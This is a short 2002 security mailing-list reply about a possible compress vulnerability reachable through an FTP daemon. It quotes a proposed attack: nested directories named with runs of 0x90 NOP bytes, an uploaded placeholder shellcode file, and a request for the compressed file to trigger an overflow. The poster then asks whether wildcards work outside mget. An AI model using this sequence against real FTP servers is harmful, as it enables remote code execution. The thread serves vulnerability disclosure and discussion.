Re: compress(vul) + ftpd(?)

From: HypH (hyphenat_private)
Date: Mon Mar 11 2002 - 07:53:15 PST

  • Next message: Mats Linander: "Re: compress(vul) + ftpd(?)"

    On Sun 10. March 2002 06:06, H D Moore wrote:
    > How about:
    > ftp> mkdir A<254 * 0x90>
    > ftp> cd A*
    > ftp> mkdir B<255 * 0x90>
    > ftp> cd B*
    > ftp> mkdir C<255 * 0x90>
    > ftp> cd C*
    > ftp> mkdir D<255 * 0x90>
    > ftp> cd D*
    > ftp> put <reallysmallscode>
    > ftp> cd ../../../../
    > ftp> get A*/B*/C*/D*/reallysmallscode.Z
    OK. But isn`t it so that wildcards can be only used with mget?(!)
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